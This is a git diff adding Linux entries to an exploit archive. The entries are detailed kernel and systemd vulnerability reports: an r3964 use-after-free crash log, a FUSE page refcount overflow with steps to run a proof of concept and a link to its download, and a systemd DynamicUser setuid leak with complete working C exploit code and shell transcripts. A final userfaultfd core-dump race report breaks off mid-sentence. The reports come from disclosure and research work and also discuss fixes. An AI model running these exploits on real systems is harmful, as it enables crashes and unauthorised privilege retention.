+[   82.724930] Code: c4 80 74 04 41 8b 72 6c 4c 89 d7 e8 61 1c f9 ff eb 86 41 b8 01 00 00 00 48 89 d9 48 89 da 4c 89 d6 e8 8b f6 ff ff e9 6d ff ff ff <0f> 0b 48 8b 3d 6d c5 1c 01 e9 c9 fe ff ff 0f 1f 84 00 00 00 00 
+[   82.729909] RIP: kfree+0x16a/0x180 RSP: ffffb6b381d7fd50
+[   82.731310] ---[ end trace c1cd537c5d2e0b84 ]---
+==================================
+
+
+I've also tried this on 5.0-rc2 with KASAN on, which resulted in this splat:
+
+==================================
+[   69.883056] ==================================================================
+[   69.885163] BUG: KASAN: use-after-free in r3964_ioctl+0x288/0x3c0
+[   69.886855] Read of size 8 at addr ffff8881e0474020 by task r3964_racer/1134
+[   69.888820] 
+[   69.889251] CPU: 3 PID: 1134 Comm: r3964_racer Not tainted 5.0.0-rc2 #238
+[   69.891729] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
+[   69.894535] Call Trace:
+[   69.895223]  dump_stack+0x71/0xab
+[   69.896134]  ? r3964_ioctl+0x288/0x3c0
+[   69.897181]  print_address_description+0x6a/0x270
+[   69.898473]  ? r3964_ioctl+0x288/0x3c0
+[   69.899499]  ? r3964_ioctl+0x288/0x3c0
+[   69.900534]  kasan_report+0x14e/0x192
+[   69.901562]  ? r3964_ioctl+0x288/0x3c0
+[   69.902606]  r3964_ioctl+0x288/0x3c0
+[   69.903586]  tty_ioctl+0x227/0xbd0
+[...]
+[   69.917312]  do_vfs_ioctl+0x134/0x8f0
+[...]
+[   69.926807]  ksys_ioctl+0x70/0x80
+[   69.927709]  __x64_sys_ioctl+0x3d/0x50
+[   69.928734]  do_syscall_64+0x73/0x160
+[   69.929741]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
+[   69.931099] RIP: 0033:0x7f6491542dd7
+[   69.932068] Code: 00 00 00 48 8b 05 c1 80 2b 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 91 80 2b 00 f7 d8 64 89 01 48
+[   69.937051] RSP: 002b:00007f6491460f28 EFLAGS: 00000206 ORIG_RAX: 0000000000000010
+[   69.939067] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f6491542dd7
+[   69.940977] RDX: 000000000000000f RSI: 0000000000005301 RDI: 0000000000000004
+[   69.942905] RBP: 00007f6491460f50 R08: 0000000000000000 R09: 0000000000000018
+[   69.944800] R10: 0000000000000064 R11: 0000000000000206 R12: 0000000000000000
+[   69.947600] R13: 00007ffeb17a9b4f R14: 0000000000000000 R15: 00007f6491c42040
+[   69.949491] 
+[   69.949923] Allocated by task 1131:
+[   69.950866]  __kasan_kmalloc.constprop.8+0xa5/0xd0
+[   69.952147]  kmem_cache_alloc_trace+0xfa/0x200
+[   69.953352]  r3964_ioctl+0x2e6/0x3c0
+[   69.954333]  tty_ioctl+0x227/0xbd0
+[   69.955267]  do_vfs_ioctl+0x134/0x8f0
+[   69.956248]  ksys_ioctl+0x70/0x80
+[   69.957150]  __x64_sys_ioctl+0x3d/0x50
+[   69.958169]  do_syscall_64+0x73/0x160
+[   69.959148]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
+[   69.960485] 
+[   69.960910] Freed by task 1131:
+[   69.961764]  __kasan_slab_free+0x135/0x180
+[   69.962851]  kfree+0x90/0x1d0
+[   69.963660]  r3964_ioctl+0x208/0x3c0
+[   69.964631]  tty_ioctl+0x227/0xbd0
+[   69.965564]  do_vfs_ioctl+0x134/0x8f0
+[   69.966540]  ksys_ioctl+0x70/0x80
+[   69.967424]  __x64_sys_ioctl+0x3d/0x50
+[   69.968424]  do_syscall_64+0x73/0x160
+[   69.969414]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
+[   69.970768] 
+[   69.971182] The buggy address belongs to the object at ffff8881e0474008
+[   69.971182]  which belongs to the cache kmalloc-64 of size 64
+[   69.974429] The buggy address is located 24 bytes inside of
+[   69.974429]  64-byte region [ffff8881e0474008, ffff8881e0474048)
+[   69.977470] The buggy address belongs to the page:
+[   69.978744] page:ffffea0007811d00 count:1 mapcount:0 mapping:ffff8881e600f740 index:0x0 compound_mapcount: 0
+[   69.981316] flags: 0x17fffc000010200(slab|head)
+[   69.982528] raw: 017fffc000010200 ffffea0007554508 ffffea0007811e08 ffff8881e600f740
+[   69.984722] raw: 0000000000000000 0000000000270027 00000001ffffffff 0000000000000000
+[   69.984723] page dumped because: kasan: bad access detected
+[   69.984724] 
+[   69.984725] Memory state around the buggy address:
+[   69.984727]  ffff8881e0473f00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
+[   69.984729]  ffff8881e0473f80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
+[   69.984731] >ffff8881e0474000: fc fb fb fb fb fb fb fb fb fc fc fc fc fc fc fc
+[   69.984732]                                ^
+[   69.984734]  ffff8881e0474080: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
+[   69.984736]  ffff8881e0474100: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
+[   69.984737] ==================================================================
+[   69.984739] Disabling lock debugging due to kernel taint
+[   69.996233] ==================================================================
+==================================
+
+
+I wonder whether it would, in addition to fixing the locking, also make sense to
+gate the line discipline on some sort of capability - it seems wrong to me that
+this kind of code is exposed to every user on the system.
+*/
\ No newline at end of file
diff --git a/exploits/linux/dos/46745.txt b/exploits/linux/dos/46745.txt
new file mode 100644
index 000000000..33c2e94c4
--- /dev/null
+++ b/exploits/linux/dos/46745.txt
@@ -0,0 +1,214 @@
+Linux: page->_refcount overflow via FUSE with ~140GiB RAM usage
+
+Tested on:
+Debian Buster
+distro kernel "4.19.0-1-amd64 #1 SMP Debian 4.19.12-1 (2018-12-22)"
+KVM guest with 160000MiB RAM
+
+A while back, there was some discussion about possible overflows of the
+`mapcount` in `struct page`, started by Daniel Micay.
+See the following threads:
+
+https://lore.kernel.org/lkml/CAG48ez3R7XL8MX_sjff1FFYuARX_58wA_=ACbv2im-XJKR8tvA@mail.gmail.com/t/#u
+"Re: [PATCH v5 07/27] mm/mmap: Create a guard area between VMAs"
+Sent by me, forwarding Daniel Micay's concern about overflows of `mapcount`.
+
+https://lore.kernel.org/lkml/20180208021112.GB14918@bombadil.infradead.org/T/
+"[RFC] Warn the user when they could overflow mapcount"
+from Matthew Wilcox <willy@infradead.org>
+
+
+I have now noticed that the `_refcount` has a similar problem, and it is
+possible to overflow it on a machine with ~140GiB of RAM (or probably also less
+on kernels that have commit 5da784cce4308 ("fuse: add max_pages to init_out"),
+but that's very recent, it landed in 4.20).
+
+A FUSE request can, by default (and on kernels <4.20 always), contain up to
+FUSE_DEFAULT_MAX_PAGES_PER_REQ==32 (on older kernels FUSE_MAX_PAGES_PER_REQ==32)
+page references. (>=4.20 allows the user to bump that limit up to
+FUSE_MAX_MAX_PAGES==256.) The page references in a FUSE request are stored as
+an array whose elements are concatenations of a `struct page *` and a
+`struct fuse_page_desc` (8 bytes, containing length and offset inside the page).
+This means that each page reference consumes 16 bytes, so to overflow the
+32-bit `_refcount` of a page, pow(2,32)*16B=64GiB of kernel memory are needed as
+storage for such references allocated with fuse_req_pages_alloc(). All other
+overhead is at least per-FUSE-request and distributed over
+FUSE_DEFAULT_MAX_PAGES_PER_REQ==32 references.
+
+FUSE does permit read/write operations that operate on more pages than the
+maximum FUSE request page count; in this case, if direct I/O is used,
+fuse_direct_io() splits the operation into multiple requests. This means that
+the only limits at the VFS layer are MAX_RW_COUNT==0x7ffff000 and
+UIO_MAXIOV==0x400.
+
+This means that it is possible to create 0x7ffff references to a page that can
+be freely mapped in userspace as follows:
+
+ - Set up a virtual memory area that contains 0x200 consecutive mappings of the
+   same page.
+ - Create an array of UIO_MAXIOV==0x400 identical IO vectors that point to the
+   area containing the 0x200 mappings.
+ - Open a FUSE-backed file with O_DIRECT. (This file should ***NOT*** be served
+   as FOPEN_DIRECT_IO by the FUSE filesystem, that prevents AIO from working
+   AFAICS! That probably counts as a bug if I'm right...)
+ - Use the UIO_MAXIOV==0x400 IO vectors for a read operation on the file.
+ - Let the FUSE filesystem leave the read requests pending.
+
+By sending 0x2000 such read operations, the _refcount can be brought close to
+overflow.
+
+(Technically, you could play games with unaligned addresses and such to increase
+the number of references per read operation a bit further.)
+
+In order to avoid needing one client-side userspace thread per read operation,
+it is possible to use AIO. AIO is able to send read operations that will be
+processed asynchronously by FUSE; however, FUSE limits the number of resulting
+FUSE requests ***per FUSE filesystem*** to a variable number that depends on the
+amount of physical memory the system has (see sanitize_global_limit(); the limit
+is the amount of RAM multiplied with 2^-13). Since this limit is per-filesystem,
+as long as a single filesystem operation's FUSE requests fit in the limit,
+an attacker can distribute the filesystem operations across multiple FUSE
+filesystems.
+
+AIO also imposes a global limit on the number of pending operations.
+The official limit for pending AIO operations across the system is
+aio_max_nr==0x10000; however, as a comment in fs/aio.c explains,
+the real limit is significantly higher, and up to 0x10000 *pages* of
+io_event structs (minus the overhead of `struct aio_ring`)
+can be used (see aio_setup_ring()); this means that the real limit is
+0x10000*((0x1000-128)/32)==0x7c0000 operations.
+But since the bug can be triggered with ~0x2000 parallel pread operations, that
+doesn't matter here anyway.
+
+
+I am attaching a crash PoC.
+
+First, to make it possible to call dump_page() from userspace for easier
+debugging:
+
+ - Unpack dump_page_dev.tar.
+ - Build the kernel module in dump_page_dev/ with "make".
+ - Load the built kernel module with "sudo insmod dump_page_dev.ko".
+
+For the actual PoC:
+
+ - Ensure that there is no distro-specific sysctl that prevents unprivileged
+   namespace creation (on Debian:
+   "echo 1 > /proc/sys/kernel/unprivileged_userns_clone"). This is necessary
+   to be able to create a mount namespace and mount as many FUSE filesystems as
+   we want in there; the SUID fusermount helper imposes a limit of 1000 FUSE
+   mounts.
+ - Unpack fuse_aio.tar.
+ - Build the PoC with ./compile.sh.
+ - Launch a new graphical terminal with multiple tabs in a new mount namespace,
+   using a command like
+   `unshare -mUrp --mount-proc --fork xfce4-terminal --disable-server`.
+ - Inside the namespace, run ./fuse_aio to mount 0x2000 FUSE filesystems.
+ - In a second terminal tab inside the namespace, run ./aio_reader to trigger
+   the bug.
+ - Wait and watch `sudo dmesg -w`.
+
+You should see debug output like this in dmesg:
+
+[  304.782310] fuse init (API version 7.27)
+[  309.607367] mmap: aio_reader (10371) uses deprecated remap_file_pages() syscall. See Documentation/vm/remap_file_pages.rst.
+[  309.631150] dump_page: ---------- STARTING DUMP ----------
+[  309.631154] dump_page: DUMP MARKER: 0x0
+[  309.631158] page:fffff7bad9e04fc0 count:8194 mapcount:8192 mapping:ffffa0f08abdb358 index:0x0
+[  309.631162] flags: 0x17fffc00004007c(referenced|uptodate|dirty|lru|active|swapbacked)
+[  309.631165] raw: 017fffc00004007c fffff7bad9e049c8 ffffa0f0a04e0c10 ffffa0f08abdb358
+[  309.631167] raw: 0000000000000000 0000000000000000 0000200200001fff ffffa0f0a036e000
+[  309.631169] page dumped because: dump requested via ioctl
+[  309.631170] page->mem_cgroup:ffffa0f0a036e000
+[  309.631171] dump_page: ==========  END OF DUMP  ==========
+[  309.667063] dump_page: ---------- STARTING DUMP ----------
+[  309.667067] dump_page: DUMP MARKER: 0x1
+[  309.667070] page:fffff7bad9e04fc0 count:532481 mapcount:8192 mapping:ffffa0f08abdb358 index:0x0
+[  309.667074] flags: 0x17fffc00004007c(referenced|uptodate|dirty|lru|active|swapbacked)
+[  309.667078] raw: 017fffc00004007c fffff7bad9e049c8 fffff7bad9d09a08 ffffa0f08abdb358
+[  309.667080] raw: 0000000000000000 0000000000000000 0008200100001fff ffffa0f0a036e000
+[  309.667081] page dumped because: dump requested via ioctl
+[  309.667082] page->mem_cgroup:ffffa0f0a036e000
+[  309.667083] dump_page: ==========  END OF DUMP  ==========
+[  423.507289] dump_page: ---------- STARTING DUMP ----------
+[  423.507293] dump_page: DUMP MARKER: 0x2
+[  423.507296] page:fffff7bad9e04fc0 count:-2147479550 mapcount:8192 mapping:ffffa0f08abdb358 index:0x0
+[  423.507299] flags: 0x17fffc00004007c(referenced|uptodate|dirty|lru|active|swapbacked)
+[  423.507302] raw: 017fffc00004007c fffff7bad9e049c8 fffff7bad9d09a08 ffffa0f08abdb358
+[  423.507303] raw: 0000000000000000 0000000000000000 8000100200001fff ffffa0f0a036e000
+[  423.507304] page dumped because: dump requested via ioctl
+[  423.507305] page->mem_cgroup:ffffa0f0a036e000
+[  423.507306] dump_page: ==========  END OF DUMP  ==========
+[  608.388324] dump_page: ---------- STARTING DUMP ----------
+[  608.388333] dump_page: DUMP MARKER: 0x3
+[  608.388340] page:fffff7bad9e04fc0 count:2 mapcount:8192 mapping:ffffa0f08abdb358 index:0x0
+[  608.388347] flags: 0x17fffc00004007c(referenced|uptodate|dirty|lru|active|swapbacked)
+[  608.388353] raw: 017fffc00004007c fffff7bad9e049c8 fffff7bad9d09a08 ffffa0f08abdb358
+[  608.388358] raw: 0000000000000000 0000000000000000 0000000200001fff ffffa0f0a036e000
+[  608.388361] page dumped because: dump requested via ioctl
+[  608.388363] page->mem_cgroup:ffffa0f0a036e000
+[  608.388365] dump_page: ==========  END OF DUMP  ==========
+[  608.390616] dump_page: ---------- STARTING DUMP ----------
+[  608.390620] dump_page: DUMP MARKER: 0x4
+[  608.390624] page:fffff7bad9e04fc0 count:-510 mapcount:7680 mapping:ffffa0f08abdb358 index:0x1
+[  608.390628] flags: 0x17fffc000000004(referenced)
+[  608.390632] raw: 017fffc000000004 fffff7ba54000948 ffffa0f0b35e62f8 ffffa0f08abdb358
+[  608.390636] raw: 0000000000000001 0000000000000000 fffffe0200001dff 0000000000000000
+[  608.390639] page dumped because: dump requested via ioctl
+[  608.390641] dump_page: ==========  END OF DUMP  ==========
+[...]
+[  608.409077] dump_page: ---------- STARTING DUMP ----------
+[  608.409079] dump_page: DUMP MARKER: 0x4
+[  608.409081] page:fffff7bad9e04fc0 count:-7678 mapcount:512 mapping:ffffa0f08abdb358 index:0x1
+[  608.409083] flags: 0x17fffc000000004(referenced)
+[  608.409085] raw: 017fffc000000004 fffff7ba54000948 ffffa0f0b35e62f8 ffffa0f08abdb358
+[  608.409086] raw: 0000000000000001 0000000000000000 ffffe202000001ff 0000000000000000
+[  608.409087] page dumped because: dump requested via ioctl
+[  608.409088] dump_page: ==========  END OF DUMP  ==========
+[  608.409988] dump_page: ---------- STARTING DUMP ----------
+[  608.409990] dump_page: DUMP MARKER: 0x5
+[  608.409992] page:fffff7bad9e04fc0 count:-8189 mapcount:1 mapping:ffffa0f08abdb358 index:0x1
+[  608.409994] flags: 0x17fffc000000004(referenced)
+[  608.409996] raw: 017fffc000000004 fffff7ba54000948 ffffa0f0b35e62f8 ffffa0f08abdb358
+[  608.409999] raw: 0000000000000001 0000000000000000 ffffe00300000000 0000000000000000
+[  608.410000] page dumped because: dump requested via ioctl
+[  608.410000] dump_page: ==========  END OF DUMP  ==========
+
+As you can see, the reference count of the page (when interpreted as an unsigned
+number) goes up to 2^32-1 and wraps around, then goes down again and wraps back. 
+When the refcount wraps back, the page AFAIU moves onto a freelist, and you can
+see that e.g. its flags change at that point.
+
+If you interact with the system a bit at this point, you'll soon run into
+various kinds of kernel BUG()s.
+
+
+My guess is that most people don't have machines with >=140GiB RAM at this
+point, so luckily, issues like this are probably not a big problem for most
+users yet.
+
+As far as I can tell, there are a bunch of potential ways to deal with this
+issue:
+
+1. Make refcount/mapcount bigger; but as Matthew Wilcox points out in
+   <https://lore.kernel.org/lkml/20180208194235.GA3424@bombadil.infradead.org/>,
+   that would cost something like 2GiB of RAM on a machine with 1TiB RAM.
+2. Dirty hack: Detect refcount/mapcount overflow and freeze them at a high
+   value, in order to deterministically leak references to that page.
+   Downside is that memory is still going to leak permanently.
+   This is what refcount_t does on X86 or when CONFIG_REFCOUNT_FULL is set.
+3. Daniel Micay's suggestion: Dynamically switch from a small inline refcount to
+   an out-of-line refcount in some sort of lookup structure
+   (<https://lore.kernel.org/lkml/CA+DvKQKba0iU+tydbmGkAJsxCxazORDnuoe32sy-2nggyagUxQ@mail.gmail.com/>).
+4. Ad-hoc fixes to keep the number of possible references down, see e.g.:
+    - https://lore.kernel.org/lkml/20180208213743.GC3424@bombadil.infradead.org/
+    - commit 92117d8443bc5afacc8d5ba82e541946310f106e ("bpf: fix refcnt overflow")
+
+Number 1 is obviously correct, but probably unacceptable given its cost; number
+4 is probably the next-easiest solution for any specific way to overflow some
+reference counter, but as Daniel said, it smells of whack-a-mole.
+That leaves numbers 2 and 3, I guess, unless someone has a better idea?
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/46745.zip
\ No newline at end of file
diff --git a/exploits/linux/dos/46760.txt b/exploits/linux/dos/46760.txt
new file mode 100644
index 000000000..2b9381a69
--- /dev/null
+++ b/exploits/linux/dos/46760.txt
@@ -0,0 +1,305 @@
+This bug report describes a bug in systemd that allows a service with
+DynamicUser in collaboration with another service or user to create a setuid
+binary that can be used to access its UID beyond the lifetime of the service.
+This bug probably has relatively low severity, given that there aren't many
+services yet that use DynamicUser, and the requirement of collaboration with
+another process limits the circumstances in which it would be useful to an
+attacker further; but in a system that makes heavy use of DynamicUser, it would
+probably have impact.
+
+<https://www.freedesktop.org/software/systemd/man/systemd.exec.html#DynamicUser=>
+says:
+
+    In order to allow the service to write to certain directories, they have to
+    be whitelisted using ReadWritePaths=, but care must be taken so that UID/GID
+    recycling doesn't create security issues involving files created by the
+    service.
+
+While I was chatting about DynamicUser with catern on IRC, I noticed that
+DynamicUser doesn't isolate the service from the rest of the system in terms of
+UNIX domain sockets; therefore, if a collaborating user passes a file descriptor
+to a world-writable path outside the service's mount namespace into the
+service, the service can then create setuid files that can be used by the
+collaborating user beyond the lifetime of the service.
+
+
+To reproduce:
+
+As a user:
+======================================================================
+user@deb10:~$ mkdir systemd_uidleak
+user@deb10:~$ cd systemd_uidleak
+user@deb10:~/systemd_uidleak$ cat > breakout_assisted.c
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/socket.h>
+#include <sys/un.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <err.h>
+
+int main(void) {
+  setbuf(stdout, NULL);
+
+  // prepare unix domain socket
+  int s = socket(AF_UNIX, SOCK_DGRAM, 0);
+  if (s < 0) err(1, "unable to create unix domain socket");
+  struct sockaddr_un addr = {
+    .sun_family = AF_UNIX,
+    .sun_path = "\0breakout"
+  };
+  if (bind(s, (struct sockaddr *)&addr, sizeof(sa_family_t)+1+8))
+    err(1, "unable to bind abstract socket");
+  puts("waiting for connection from outside the service...");
+
+  // receive fd to somewhere under the real root
+  int len = sizeof(struct cmsghdr) + sizeof(int);
+  struct cmsghdr *hdr = alloca(len);
+  struct msghdr msg = {
+    .msg_control = hdr,
+    .msg_controllen = len
+  };
+  if (recvmsg(s, &msg, 0) < 0) err(1, "unable to receive fd");
+  if (hdr->cmsg_len != len || hdr->cmsg_level != SOL_SOCKET
+      || hdr->cmsg_type != SCM_RIGHTS)
+    errx(1, "got bad message");
+  puts("got rootfd from other chroot...");
+  if (fchdir(*(int*)CMSG_DATA(hdr))) err(1, "unable to change into real root");
+  char curpath[4096];
+  if (!getcwd(curpath, sizeof(curpath))) err(1, "unable to getpath()");
+  printf("chdir successful, am now in %s\n", curpath);
+
+  // create suid file
+  int src_fd = open("suid_src", O_RDONLY);
+  if (src_fd == -1) err(1, "open suid_src");
+  int dst_fd = open("suid_dst", O_RDWR|O_CREAT|O_EXCL, 0644);
+  if (dst_fd == -1) err(1, "open suid_dst");
+
+  while (1) {
+    char buf[1000];
+    ssize_t res = read(src_fd, buf, sizeof(buf));
+    if (res == -1) err(1, "read");
+    if (res == 0) break;
+    ssize_t res2 = write(dst_fd, buf, res);
+    if (res2 != res) err(1, "write");
+  }
+
+  if (fchmod(dst_fd, 04755)) err(1, "fchmod");
+  close(src_fd);
+  close(dst_fd);
+
+  // and that's it!
+  puts("done!");
+  while (1) pause();
+  return 0;
+}
+user@deb10:~/systemd_uidleak$ gcc -o breakout_assisted breakout_assisted.c 
+user@deb10:~/systemd_uidleak$ cat > breakout_helper.c
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <fcntl.h>
+#include <sys/socket.h>
+#include <sys/un.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <err.h>
+
+int main(void) {
+  int rootfd = open(".", O_PATH);
+  if (rootfd < 0) err(1, "unable to open cwdfd");
+  int s = socket(AF_UNIX, SOCK_DGRAM, 0);
+  if (s < 0) err(1, "unable to create unix domain socket");
+  struct sockaddr_un addr = {
+    .sun_family = AF_UNIX,
+    .sun_path = "\0breakout"
+  };
+  if (connect(s, (struct sockaddr *)&addr, sizeof(sa_family_t)+1+8))
+    err(1, "unable to connect to abstract socket");
+  puts("connected to other chroot, sending cwdfd...");
+
+  int len = sizeof(struct cmsghdr) + sizeof(int);
+  struct cmsghdr *hdr = alloca(len);
+  *hdr = (struct cmsghdr) {
+    .cmsg_len = len,
+    .cmsg_level = SOL_SOCKET,
+    .cmsg_type = SCM_RIGHTS
+  };
+  *(int*)CMSG_DATA(hdr) = rootfd;
+  struct msghdr msg = {
+    .msg_control = hdr,
+    .msg_controllen = len
+  };
+  if (sendmsg(s, &msg, 0) < 0) err(1, "unable to send fd");
+  puts("all ok on this side!");
+  return 0;
+}
+user@deb10:~/systemd_uidleak$ gcc -o breakout_helper breakout_helper.c 
+user@deb10:~/systemd_uidleak$ cp /usr/bin/id suid_src
+user@deb10:~/systemd_uidleak$ chmod 0777 .
+user@deb10:~/systemd_uidleak$ ls -la .
+total 100
+drwxrwxrwx  2 user user  4096 Feb  4 21:22 .
+drwxr-xr-x 23 user user  4096 Feb  4 21:19 ..
+-rwxr-xr-x  1 user user 17432 Feb  4 21:20 breakout_assisted
+-rw-r--r--  1 user user  1932 Feb  4 21:20 breakout_assisted.c
+-rwxr-xr-x  1 user user 16872 Feb  4 21:22 breakout_helper
+-rw-r--r--  1 user user  1074 Feb  4 21:22 breakout_helper.c
+-rwxr-xr-x  1 user user 43808 Feb  4 21:22 suid_src
+user@deb10:~/systemd_uidleak$ 
+======================================================================
+
+Then, as root, create and launch a service around breakout_assisted:
+======================================================================
+root@deb10:/home/user# cat > /etc/systemd/system/dynamic-user-test.service
+[Service]
+ExecStart=/home/user/systemd_uidleak/breakout_assisted
+DynamicUser=yes
+root@deb10:/home/user# systemctl daemon-reload
+root@deb10:/home/user# systemctl start dynamic-user-test.service
+root@deb10:/home/user# systemctl status dynamic-user-test.service
+[...]
+Feb 04 21:27:29 deb10 systemd[1]: Started dynamic-user-test.service.
+Feb 04 21:27:29 deb10 breakout_assisted[3155]: waiting for connection from outside the service...
+root@deb10:/home/user# 
+======================================================================
+
+Now again as a user, run the breakout_helper:
+======================================================================
+user@deb10:~/systemd_uidleak$ ./breakout_helper 
+connected to other chroot, sending cwdfd...
+all ok on this side!
+user@deb10:~/systemd_uidleak$ ls -la
+total 144
+drwxrwxrwx  2 user  user   4096 Feb  4 21:28 .
+drwxr-xr-x 23 user  user   4096 Feb  4 21:19 ..
+-rwxr-xr-x  1 user  user  17432 Feb  4 21:20 breakout_assisted
+-rw-r--r--  1 user  user   1932 Feb  4 21:20 breakout_assisted.c
+-rwxr-xr-x  1 user  user  16872 Feb  4 21:22 breakout_helper
+-rw-r--r--  1 user  user   1074 Feb  4 21:22 breakout_helper.c
+-rwsr-xr-x  1 64642 64642 43808 Feb  4 21:28 suid_dst
+-rwxr-xr-x  1 user  user  43808 Feb  4 21:22 suid_src
+user@deb10:~/systemd_uidleak$ ./suid_dst 
+uid=1000(user) gid=1000(user) euid=64642 groups=1000(user),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),113(scanner)
+user@deb10:~/systemd_uidleak$ 
+======================================================================
+
+
+On fixing this:
+
+catern suggested that it might be more robust to use seccomp() to block
+chmod()/fchmod() calls with modes that include setuid/setgid bits, like the
+Nix build process. See
+<https://nixos.org/releases/nix/nix-2.1.3/manual/#ssec-relnotes-1.11.10>:
+
+> To prevent this issue, Nix now disallows builders to create setuid and setgid
+> binaries. On Linux, this is done using a seccomp BPF filter.
+
+This seems like the least intrusive fix to me. As far as I can tell, it should
+be sufficient to prevent the creation of setuid binaries that are reachable
+beyond the death of the service. Unfortunately, for setgid files, the following
+trick also needs to be mitigated, assuming that the distribution hasn't blocked
+the unprivileged creation of user namespaces:
+
+======================================================================
+user@deb10:~/systemd_uidleak_gid$ cat map_setter.c
+#include <unistd.h>
+#include <fcntl.h>
+#include <err.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+static void write_file(char *type, int pid, char *buf) {
+  char file_path[100];
+  sprintf(file_path, "/proc/%d/%s", pid, type);
+  int fd = open(file_path, O_WRONLY);
+  if (fd == -1) err(1, "open %s", file_path);
+  if (write(fd, buf, strlen(buf)) != strlen(buf))
+    err(1, "write %s", type);
+  close(fd);
+}
+
+static void write_map(char *type, int pid, int upper, int lower) {
+  char buf[100];
+  sprintf(buf, "%d %d 1", upper, lower);
+  write_file(type, pid, buf);
+}
+
+int main(void) {
+  FILE *pid_file = fopen("/home/user/systemd_uidleak_gid/pid_file", "r");
+  if (pid_file == NULL) err(1, "open pid_file");
+  int pid;
+  if (fscanf(pid_file, "%d", &pid) != 1) err(1, "fscanf");
+
+  write_file("setgroups", pid, "deny");
+  write_map("gid_map", pid, 0, getgid());
+  write_map("uid_map", pid, 0, geteuid());
+  puts("done");
+  while (1) pause();
+  return 0;
+}
+user@deb10:~/systemd_uidleak_gid$ cat sgid_maker.c
+#define _GNU_SOURCE
+#include <sched.h>
+#include <err.h>
+#include <unistd.h>
+#include <string.h>
+#include <fcntl.h>
+#include <stdio.h>
+#include <sys/stat.h>
+int main(void) {
+  if (unshare(CLONE_NEWUSER)) err(1, "unshare CLONE_NEWUSER");
+  pid_t my_pid = getpid();
+  char my_pid_str[20];
+  sprintf(my_pid_str, "%d\n", (int)my_pid);
+  int pid_file = open("pid_file", O_WRONLY|O_CREAT|O_TRUNC, 0644);
+  if (pid_file == -1) err(1, "create pid_file");
+  if (write(pid_file, my_pid_str, strlen(my_pid_str)) != strlen(my_pid_str)) err(1, "write pid_file");
+  close(pid_file);
+  puts("pid file written, waiting for mappings...");
+  while (1) {
+    if (getuid() == 0) break;
+    sleep(1);
+  }
+  puts("mappings are up!");
+  if (setgid(0)) err(1, "setgid");
+
+  // create sgid file
+  int src_fd = open("sgid_src", O_RDONLY);
+  if (src_fd == -1) err(1, "open sgid_src");
+  int dst_fd = open("sgid_dst", O_RDWR|O_CREAT|O_EXCL, 0644);
+  if (dst_fd == -1) err(1, "open sgid_dst");
+  while (1) {
+    char buf[1000];
+    ssize_t res = read(src_fd, buf, sizeof(buf));
+    if (res == -1) err(1, "read");
+    if (res == 0) break;
+    ssize_t res2 = write(dst_fd, buf, res);
+    if (res2 != res) err(1, "write");
+  }
+  if (fchmod(dst_fd, 02755)) err(1, "fchmod");
+  close(src_fd);
+  close(dst_fd);
+}
+user@deb10:~/systemd_uidleak_gid$ cp /usr/bin/id sgid_src
+user@deb10:~/systemd_uidleak_gid$ gcc -o map_setter map_setter.c && gcc -o sgid_maker sgid_maker.c && chmod u+s map_setter && ./sgid_maker 
+pid file written, waiting for mappings...
+[#####  at this point, launch ~/systemd_uidleak_gid/map_setter in a systemd service  #####]
+mappings are up!
+user@deb10:~/systemd_uidleak_gid$ ls -l sgid_dst
+-rwxr-sr-x 1 user 64642 43808 Feb  4 23:13 sgid_dst
+user@deb10:~/systemd_uidleak_gid$ ./sgid_dst
+uid=1000(user) gid=1000(user) egid=64642 groups=64642,24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),113(scanner),1000(user)
+user@deb10:~/systemd_uidleak_gid$ 
+======================================================================
+
+I think the least intrusive way to mitigate this part might be to enforce
+NoNewPrivileges=yes for services with dynamic IDs - that way, someone inside
+such a service can't become capable over anything outside, and someone outside
+the service can't become capable over anything inside the service.
+(And really, in general, it would be nice if NoNewPrivileges=yes could become
+the norm at some point.)
\ No newline at end of file
diff --git a/exploits/linux/dos/46781.txt b/exploits/linux/dos/46781.txt
new file mode 100644
index 000000000..d0bdb56df
--- /dev/null
+++ b/exploits/linux/dos/46781.txt
@@ -0,0 +1,293 @@
+elf_core_dump() has a comment back from something like 2.5.43-C3 that says:
+
+        /*
+         * We no longer stop all VM operations.
+         * 
+         * This is because those proceses that could possibly change map_count
+         * or the mmap / vma pages are now blocked in do_exit on current
+         * finishing this core dump.
+         *
+         * Only ptrace can touch these memory addresses, but it doesn't change
+         * the map_count or the pages allocated. So no possibility of crashing
+         * exists while dumping the mm->vm_next areas to the core file.
+         */
+
+However, since commit 86039bd3b4e6 ("userfaultfd: add new syscall to provide
+memory externalization", introduced in v4.3), that's no longer true; the
+following functions can call vma_merge() on another task's VMAs while holding
+the corresponding mmap_sem for writing:
+
+ - userfaultfd_release() [->release handler]
+ - userfaultfd_register() [invoked via ->unlocked_ioctl handler]
+ - userfaultfd_unregister() [invoked via ->unlocked_ioctl handler]
+
+This means that VMAs can disappear from under elf_core_dump().
+
+
+I see two potential ways to fix this, but I'm not sure whether either of them is
+good:
+
+1. Let elf_core_dump() hold a read lock on the mmap_sem across the page-dumping
+   loop. This would mean that the mmap_sem can be blocked indefinitely by a
+   userspace process, and e.g. userfaultfd_release() could block the task or
